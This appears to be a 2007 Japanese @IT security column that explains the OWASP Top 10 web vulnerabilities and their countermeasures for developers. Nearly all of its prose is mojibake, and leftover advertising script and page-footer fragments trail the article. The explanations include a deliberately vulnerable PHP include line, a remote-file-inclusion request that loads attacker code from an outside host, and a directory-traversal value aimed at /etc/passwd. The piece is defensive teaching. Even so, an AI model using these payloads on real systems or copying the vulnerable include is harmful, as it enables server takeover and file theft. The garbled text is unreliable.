Web�A�v���P�[�V���������O�ɒm��ׂ�10�̐Ǝ㐫�FSecurity&Trust �E�H�b�`�i47�j

» 2007�N06��13�� 10��00�� ���J
[�����C��IT]

�@Web�A�v���P�[�V�������U���҂ɕt�����܂��Ǝ㐫�̑����́A�݌v�҂�J���҂̃��x���Ŕr�����邱�Ƃ��ł��܂��B�����ɖZ���������A�ŋ߂悭�_����Ǝ㐫�̃g�b�v10��m�邱�ƂŎ����葁���T�v��m��A�J���̍ۂɂ��̑��݂��ӎ����ăZ�L���A��Web�A�v���P�[�V�����ɂ��Ă���������΍K���ł��B

Web�̐��E���������Ǝ㐫�����ʕt��

�@OWASP�iOpen Web Application Security Project�j�́A���Web�A�v���P�[�V�����̃Z�L�����e�B�����ړI�Ƃ����R�~���j�e�B�ŁA�����ł̒�����J���̐��ʕ���N�ł����p�ł���悤�Ɍ��J���Ă��܂��B

�@���̒��́uOWASP Top Ten Project�v�Ƃ����v���W�F�N�g�ł́A�N��1��Web�A�v���P�[�V�����̐Ǝ㐫�g�b�v10���f�ڂ��Ă��܂��B2004�N���͓��{����܂ފe����ł��񋟂���Ă��܂����A2007�N�ł͌��݂̂Ƃ���p��ł݂̂��񋟂���Ă��܂��B

�@�g�b�v10�ɂ͓����Ă��Ȃ��Ǝ㐫������܂����A�ŋ߂�Web�A�v���P�[�V���������������m�邽�߂֗̕��Ȏ����Ƃ��Ċ��p�ł��܂��B�Ǝ㐫�̑��݂�m��΁A�݌v������Ŗh����ӎ�����悤�ɂȂ邱�Ƃł��傤�B

OWASP Top 10 2007�Œm��Web�A�v���P�[�V�����Ǝ㐫�̊T�v

�@OWASP���甭�\���ꂽ�g�b�v10���ȒP�ɏЉ�Ă����܂��傤�BOWASP Top 10�̏ڍ׃y�[�W�ɂ́A�Ǝ㐫�̊T�v�A���ؕ��@�A�h����@�A�Q�l�����Ȃǂ��Љ��Ă���̂ŁA���ꂼ��̃����N����Q�Ƃ��Ă��������B�܂��A��IT�ł̊֘A�L�������N�������Ăǂ����B

��1�D�N���X�T�C�g�X�N���v�e�B���O�iXSS�j

�@HTML�ŕ\�����镶����̒��ɁA���ӂ̂���JavaScript��HTML�^�O�Ȃǂ������ł���Ƃ����o�O�ɂ���ċN����܂��B���Ȃ݂ɁAXSS��2�ʂ̃C���W�F�N�V�����̌��ׂ̈��ł����AXSS�͓��ʑ����Ǝ㐫���Ƃ������Ƃŕ����Ĉ����Ă���悤�ł��B

�@���̐Ǝ㐫�����邱�Ƃɂ���āA��Ȃɂ͂܂������[�U�[��Cookie��񂪍U���҂̎�ɓn�邱�ƂŁA�Z�b�V�������������Ă��܂��A�A�J�E���g�𓐂܂�Ă��܂��”\��������܂��B�܂��A�U���҂��U�̓��̓t�H�[���╶�͂�摜�Ȃǂ�ݒu���邱�Ƃł��܂��B�����āA���K��Web�y�[�W�𑕂��āA�U�̏��𗬂����ƂŁA���p�҂̏��i�l����N���W�b�g�J�[�h�ԍ��A�p�X���[�h�Ȃǁj�����W���邱�Ƃ��ł��Ă��܂��܂��B

�@���͒l�̃`�F�b�N�A�o�̓G���R�[�f�B���O�`���̎w��Ȃǂ̑΍􂪗L���ł��B�܂��A�u���b�N���X�g�����̑΍�́A���ׂẴp�^�[����ԗ����邱�Ƃ�����Ƃ������Ƃ�F�����Ă����܂��傤�B

�y�֘A�L���z

�N���X�T�C�g�X�N���v�e�B���O�΍�̊�{

http://www.atmarkit.co.jp/fsecurity/special/30xss/xss01.html

����N��Web�A�v���ق̂ڂ̉����v��i10�j

�}���`�o�C�g�̗��Ƃ���

http://www.atmarkit.co.jp/fsecurity/rensai/hoshino10/hoshino01.html


��2�D�C���W�F�N�V�����̌���

�@�L����SQL�C���W�F�N�V�������͂��߁AOS�R�}���h�ALDAP�AXPath�AXSLT�AHTML�AXML�Ȃǂ̃C���W�F�N�V����������܂��B���ӂ̂���f�[�^�������ł��邱�Ƃ𗘗p���邱�ƂŁA���̃f�[�^���R�}���h��N�G���Ƃ��ĉ��߂�����s����Ă��܂��Ƃ����Ǝ㐫�ł��B

�@���̐Ǝ㐫�ɂ���āA�U���҂��T�[�o��̃f�[�^�̉{���A�쐬��폜�Ȃǂ��ł��Ă��܂��Ƃ�����肪�N����܂��B�ň��̏ꍇ�ɂ́AOS�R�}���h�����p����ăV�X�e�������S�ɏ������Ă��܂��”\��������Ǝ㐫�ł��B

�@���͒l�̃`�F�b�N�A�v���C�X�z���_��X�g�A�h�v���V�[�W���Ȃǂ̗��p�A�f�[�^�x�[�X���ŏ������ŗ��p����Ȃǂ̑΍􂪗L���ł��B�܂��APHP��addslashes()�̂悤�Ȍ��ʂ̂����܂��ȃG�X�P�[�v�@�\���g���Ė������Ȃ��悤�ɂ��܂��傤�B

�y�֘A�L���z

Web�A�v���P�[�V�����ɐ��ރZ�L�����e�B�z�[���i2�j

�ڋq�f�[�^�����ׂē��܂��H�I�`OS��f�[�^�x�[�X�ւ̍U���`

http://www.atmarkit.co.jp/fsecurity/rensai/webhole02/webhole01.html

Security&Trust�E�H�b�`�i42�j

���镪����SQL�C���W�F�N�V�����΍�

http://www.atmarkit.co.jp/fsecurity/column/ueno/42.html


��3�D���ӂ̂���t�@�C����ǂݍ���Ŏ��s

�@������O������t�@�C����ǂݍ��ދ@�\�������Ă���ꍇ�A���̓��͂��ꂽ�f�[�^�̃`�F�b�N���s�\���Ȃ��Ƃɂ���āA�C�ӂ̃t�@�C����R�[�h��ǂݍ��܂��邱�Ƃ��ł��Ă��܂��Ƃ����o�O�ɂ���ċN����܂��BPHP�ł̓T�^�I�ȐƎ�R�[�h�Ƃ��Ă͉��L�̂悤�Ȃ��̂ł��B

include $_REQUEST['css'];

�@�U���҂��ݒu����PHP�R�[�h�ihttp://hackr.jp/attack.txt�j���A��L�̃R�[�h ���T�[�o�ihttp://www.example.com/index.php�j�ɑ΂��āA���L�̂悤�Ƀ��N�G�X�g�𑗂邱�ƂŔC�ӂ�PHP�R�[�h�̎��s���”\�ɂȂ�܂��B

http://www.example.com/index.php?css=http://hackr.jp/attack.txt

�@���̐Ǝ㐫�����邱�Ƃɂ���āA�����[�g���炠����R�[�h�����s���ꂽ��Arootkit�𑗂荞�܂�ăV�X�e����������ꂽ��A�T�[�o���̔C�ӂ̃t�@�C����ǂ܂�Ă��܂��Ƃ�����肪�N����܂��B

�@�J���t�@�C������͂ł��镶��������肵���z���C�g���X�g�����ł̑΍��A�����[�g�t�@�C���̃C���N���[�h�@�\�𗘗p���Ȃ��ݒ�iPHP�Ȃ�allow_url_fopen=off�j�ɂ�����A�f�B���N�g���𒴂����t�@�C���w����ł��Ȃ��悤�ɂ����肷��΍􂪗L���ł��B

��4�D�I�u�W�F�N�g�̒��ڎQ��

�@URL��p�����[�^��ς��邱�ƂŁA�{��������ׂ��ł͂Ȃ��I�u�W�F�N�g�ɃA�N�Z�X���邱�Ƃ��ł��Ă��܂��o�O�ɂ���ċN����܂��B

�@���̐Ǝ㐫�����邱�Ƃɂ���āA�g../../../../etc/passwd%00�h�̂悤�ȃp�����[�^��n���āA�f�B���N�g���������̂ڂ�V�X�e�����̃t�@�C���ɃA�N�Z�X����u�f�B���N�g���g���o�[�T���v��A�gUID=ueno�h���gUID=sen�h�ɕς���ƈႤ���[�U�[�����ŃA�N�Z�X���邱�Ƃ��ł��Ă��܂��Ƃ�����肪�N����܂��B

�@�I�u�W�F�N�g�ɃA�N�Z�X����ۂɌ��������؂�����A�p�����[�^�Ƃ��Ď󂯕t����l�𐧌�����Ȃǂ̑΍􂪗L���ł��B

�y�֘A�L���z

Web�A�v���P�[�V�����ɐ��ރZ�L�����e�B�z�[���i1�j

�T�[�o�̃t�@�C�����ی����H�I

http://www.atmarkit.co.jp/fsecurity/rensai/webhole01/webhole01.html

����N��Web�A�v���ق̂ڂ̉����v��i5�j

Flash�ō�����Q�[�����U���ΏۂɂȂ��ł��I

http://www.atmarkit.co.jp/fsecurity/rensai/hoshino05/hoshino01.html


��5�D�N���X�T�C�g���N�G�X�g�t�H�[�W�F��

�@CSRF�iCross Site Request Forgery�j�́A�{�����ۂ��ׂ��O����Web�y�[�W�����HTTP���N�G�X�g���󂯕t���Ă��܂��Ƃ����o�O�ɂ���ċN����܂��B

�@���̐Ǝ㐫�����邱�Ƃɂ���āA��Ȃɂ͂܂������[�U�[���O���ɐݒu���ꂽ���ӂ̂���Web�y�[�W�ɃA�N�Z�X���邱�ƂŁAWeb�A�v���P�[�V�����̉��炩�̋@�\�����s�����Ƃ�����肪�N����܂��B�U���҂��_���̂́A���O�C���F�؂�K�v�Ƃ���Web�T�C�g�������A�f�[�^�̍X�V��폜�Ƃ������@�\�����s�����悤�Ƃ��܂��B

�@�����_���ȃg�[�N�����t�H�[����URL�ɖ��ߍ���ł��̐��������m�F������A�d�v�ȃf�[�^�X�V�������ۂɂ͍ēx�F�؂��s������AGET�͎g�p���Ȃ��Ƃ������΍􂪗L���ł��B

�y�֘A�L���z

Security&Trust�E�H�b�`�i33�j

�u�ڂ��͂܂������v �\�\�m��ꂴ��CSRF�U��

http://www.atmarkit.co.jp/fsecurity/column/ueno/33.html

����N��Web�A�v���ق̂ڂ̉����v��i4�j

�܂��Ɛ�y�Ɛ���N��CSRF�̔����Ȋ֌W

http://www.atmarkit.co.jp/fsecurity/rensai/hoshino04/hoshino01.html


��6�D�ݒ���Ȃǂ̘R�����A�s�K�؂ȃG���[�n���h�����O

�@�f�[�^�x�[�X��A�v���P�[�V�����Ȃǂ��o�͂���G���[���b�Z�[�W�𗘗p�҂ɕ\�����Ă�����AWeb�A�v���P�[�V�����̃f�o�b�O�p�̃��b�Z�[�W��\��������A�F�؂̍ۂɁu�p�X���[�h���Ⴂ�܂��v�Ƃ������b�Z�[�W��\�����Ă��܂����ƂŁA�u���[�U�[ID�͍����Ă���v�Ƃ������Ƃ��Î����Ă��܂��Ƃ������s�����w���܂��B

�@���̐Ǝ㐫�����邱�Ƃɂ���āA�U���҂͎��̍U���̂��߂̏d�v�ȏ�����ɓ���邱�Ƃ��ł��܂��B

�@�J���ғ��m�ŃG���[�����ɑ΂���A�v���[�`�����L������A�A�v���P�[�V�����Ȃǂ̃G���[�\���@�\�𖳌��ɂ�����A�ڍׂȃ��b�Z�[�W��\�������ȒP�ȃ��b�Z�[�W��\�����邾���ɂ���Ƃ������΍􂪗L���ł��B

�y�֘A�L���z

Web�A�v���P�[�V�����ɐ��ރZ�L�����e�B�z�[���i4�j

�G���[���b�Z�[�W�̊댯��

http://www.atmarkit.co.jp/fsecurity/rensai/webhole04/webhole01.html

�s���N���̎���Ƒ΍�i2�j

�U���҂ɗL�p�ȏ���^���Ȃ��΍��@

http://www.atmarkit.co.jp/fsecurity/rensai/iprotect02/iprotect01.html

����N��Web�A�v���ق̂ڂ̉����v��i8�j

���[���A�h���X�̓o�^�`�F�b�N���A�]�v�Ȃ����b�ɁH

http://www.atmarkit.co.jp/fsecurity/rensai/hoshino08/hoshino01.html


��7�D�s�K�؂ȔF�؂�Z�b�V�����Ǘ�

�@�F�؋@�\��Z�b�V�����Ǘ��A���O�A�E�g�@�\�A�p�X���[�h�Ǘ��A�閧�̎���Ȃǂ̐݌v������Ɏ�_�����邽�߁A�K�؂ɔF�؂�Z�b�V�����Ǘ����s���Ă��Ȃ��Ƃ������ɂ���ċN����܂��B

�@���̐Ǝ㐫�����邱�Ƃɂ���āA�U���҂̓��[�U�[��Ǘ��҂̃A�J�E���g�������邱�Ƃ��ł��܂��B

�@�J���ғƎ��̃Z�b�V�����Ǘ��@�\���J�������肹���A�L���g���Ă���Z�b�V�����Ǘ��@�\���g������ASSL�ȂǂňÍ�������Ă��Ȃ��y�[�W����̃��O�C���͂�����Cookie��secure������t����A�L���ȃZ�b�V�������ǂ����m�F����Ƃ������΍􂪗L���ł��B

�y�֘A�L���z

Web�A�v���P�[�V�����ɐ��ރZ�L�����e�B�z�[���i3�j

�C��t�������n��ȃZ�b�V�����Ǘ�

http://www.atmarkit.co.jp/fsecurity/rensai/webhole03/webhole01.html

Web�A�v���P�[�V�����ɐ��ރZ�L�����e�B�z�[���i14�j

Web�A�v���P�[�V�����̐Ǝ㐫�𑍊�����

http://www.atmarkit.co.jp/fsecurity/rensai/webhole14/webhole05.html


��8�D�Í��̎g�������s�K��

�@�d�v�ȃf�[�^����邽�߂ɈÍ���p����̂͗L���ȕ��@�ł����A�J���҂��萻�̈Í��A���S���Y�����g������A�ア�A���S���Y�����̗p���Ă��܂�����A���̊Ǘ������S�łȂ�������A�Í������炵�Ă��Ȃ��Ƃ������ɂ���ċN����܂��B

�@���̐Ǝ㐫�����邱�Ƃɂ���āA�Í����ɂ���Ĉ��S�Ɏ���Ă���Ǝv������ł����񂪁A�ȒP�ɘR�������Ă��܂��Ƃ������”\��������܂��B

�@���萻�̃A���S���Y���₷�łɐƎ㐫�����‚����Ă���A���S���Y�����g�킸�ɁA��ʓI�Ɏg���Ă���A���S���Y�����̗p���A���Ǘ������S�ɂ���Ƃ������΍􂪗L���ł��B

�y�֘A�L���z

NewsInsight

APOP�Ƀp�X���[�h�R�����̐Ǝ㐫�AIPA�́u���{�I�ȑ΍�Ȃ��v

http://www.atmarkit.co.jp/news/200704/19/apop.html

�f�t�@�N�g�X�^���_�[�h�Í��Z�p�̑�ڍs�i1�j

���ׂĂ͂�������n�܂����`SHA-1�̐Ǝ㉻

http://www.atmarkit.co.jp/fsecurity/rensai/crypt01/crypt01.html


��9�D�ʐM���@���s�K��

�@�F�؂��K�v�ȕ����̒ʐM�̂��ׂĂ�SSL���g�p���Ă��Ȃ��A�܂��N���W�b�g�J�[�h�ԍ��Ȃǂ̏d�v�ȏ������������̒ʐM�Ŏg�p���Ă��Ȃ��Ƃ��������ɂ���ċN����܂��B

�@���̐Ǝ㐫�����邱�Ƃɂ���āA�F�؏���Z�b�V����ID�Ȃǂ��R�������邱�ƂŃA�J�E���g��������ꂽ��A�d�v�ȏ�񂪘R�������Ă��܂��܂��B

�@���ׂĂ̔F�؂��K�v�ȕ����A�l����N���W�b�g�J�[�h�ԍ��Ȃǂ̏d�v�ȏ���l�������ʐM�ł́ASSL��K�؂Ɏg�����Ƃ��L���ȑ΍�ł��B�܂��AWeb�T�[�o��f�[�^�x�[�X�V�X�e���Ԃ̒ʐM���K�؂ɕی삷��悤�ɂ��܂��傤�B

�y�֘A�L���z

SSL�ŃZ�L���A��EC�T�C�g�\�z

http://www.atmarkit.co.jp/fsecurity/special/01ssl/ssl01.html

�f�[�^�x�[�X�Z�L�����e�B�̊�b�̃L�\�i6�j

Oracle�T�[�o�ɑ΂���ʐM�o�H�̈Í���

http://www.atmarkit.co.jp/fsecurity/rensai/dbsec06/dbsec01.html


��10�DURL�ւ̃A�N�Z�X�����̕s��

�@�Ⴆ��Web�T�C�g�̊Ǘ��҃y�[�W�ւ̃A�N�Z�X���A�A�N�Z�X����@�\��݂����AURL���B���Ă��邱�Ƃ����ɗ����Ă���Ƃ��������ɂ���ċN����܂��B���̐Ǝ㐫������ƁA���炩�̗��R�ʼnB���Ă���URL�����‚����Ă��܂����ꍇ�A�U���҂͐�������邱�ƂȂ����̃y�[�W�𗘗p���邱�Ƃ��ł��Ă��܂��܂��B

�@�A�N�Z�X�𐧌����������ׂẴy�[�W�ɂ̓A�N�Z�X����̋@�\���������܂��傤�B�y�[�W��@�\���ƂɃA�N�Z�X����̃}�g���b�N�X�𖾊m�ɂ��邱�Ƃ�A�t���[�����[�N�����p���Ăǂ̃y�[�W�ł������I�ɃA�N�Z�X����@�\�������悤�ɂ���Ƃ������΍􂪗L���ł��B

�܂��́A�Z�L�����e�B��K�v�ȋ@�\�Ƃ��ĔF�����邱�Ƃ���

�@���N���O����Web�A�v���P�[�V�����̃Z�L�����e�B�̕K�v���ɂ‚��Ă͌���Ă��܂����A�܂����̈ӎ��͋��L�ł��Ă��Ȃ��̂�����ł��傤�B

�@�u�Z�L�����e�B�͒lj�������́v�Ƃ����F���ŁA���i�����ȂǂŃR�X�g��[�����ŗD��ƂȂ����Ƃ��A�{�̋@�\�̎����݂̂��s���A���ʂƂ��ăZ�L�����e�B���lj�����Ȃ������Ƃ������ƂɂȂ��Ă���̂ł͂Ȃ��ł��傤���B�u�Z�L�����e�B�΍�v�Ƃ������t���A�Z�L�����e�B�͌�t���Ƃ����C���[�W�Ȃ̂��ǂ��Ȃ��̂�������܂���B

�@�Z�L�����e�B�͒lj�������̂ł͂���܂���B���炩���ߐ݌v������F�����A�u�Z�L�����e�B���{�̂̈ꕔ�v�Ƃ��ׂ��ł��B�”\�ł���Ό��ς���ɂ��D�荞�ނ��ƂŁA�Z�L���A��Web�A�v���P�[�V�����̎�����S�����Ȃ��s����悤�ɂ��������̂ł��B

Profile

��� ��i������ ����j

������Ѓg���C�R�[�_��\�����

�l�b�g���[�N�E�T�[�o�[ �Z�L�����e�B�f�f�A�Z�L�����e�B�΍�E�^�p���P�R���T���e�B���O����ȋƖ��Ƃ��Ă���B

�ߒ��Ɂu����킩�郁�[���v���g�R���v�A�u����킩��TCP/IP�v�A�u����킩��HTTP�v�i�����ĉj�Ёj������B�l�u���O�́u���������w���L�v


�uSecurityTrust �E�H�b�`�v�o�b�N�i���o�[

Copyright © ITmedia, Inc. All Rights Reserved.

'; }; BodyAdGAMWithCCE.prototype = Object.create(BodyAdContent.prototype); BodyAdGAMWithCCE.EVENT_INIT = 'init'; BodyAdGAMWithCCE.EVENT_READY = 'ready'; /** * AdContent �̏������Ɨ��p���� */ BodyAdGAMWithCCE.prototype.init = function () { Logger.writeln('BodyAdGAMWithCCE.prototype.init'); this.dispatchEvent(new CustomEvent(BodyAdGAMWithCCE.EVENT_INIT)); }; /** * �L���g�� GAM ���N�G�X�g */ BodyAdGAMWithCCE.prototype.activate = function () { refreshGam('InArtSpecialLink'); this.dispatchEvent(new CustomEvent(BodyAdGAMWithCCE.EVENT_READY)); }; // global reference window.itm = itm; //entry point const build = function( e ) { BodyAdEventBase.polyfill(); const bodyAdManager = BodyAdManager.getInstance(); bodyAdManager.addEventListener(BodyAdManager.EVENTS.READY, function (ev) { bodyAdManager.loadAdvertise(); }); bodyAdManager.init(); } build(); })();

�A�C�e�B���f�B�A����̂��m�点

�X�|���T�[����̂��m�点PR

���ڂ̃e�[�}

lɗȂA{ŌZLeBu_iCYv
4AI by IT - AIAAA
Microsoft WindowsőO2025
AI for GWjAO
[R[h^m[R[h Zg by IT - ITGWjArWlX̒SŊ􂷂gD
Cloud Native Central by IT - XP[uȔ\͂gD
�V�X�e���J���m�E�n�E �y�����i�r�zPR
���Ȃ��ɂ������߂̋L��PR

@IT�ɂ‚���

RSS�ɂ‚���

�A�C�e�B���f�B�AID�ɂ‚���

���[���}�K�W���o�^

��IT�̃��[���}�K�W���́A �������A���ׂĖ����ł��B���Ѓ��[���}�K�W�������w�ǂ��������B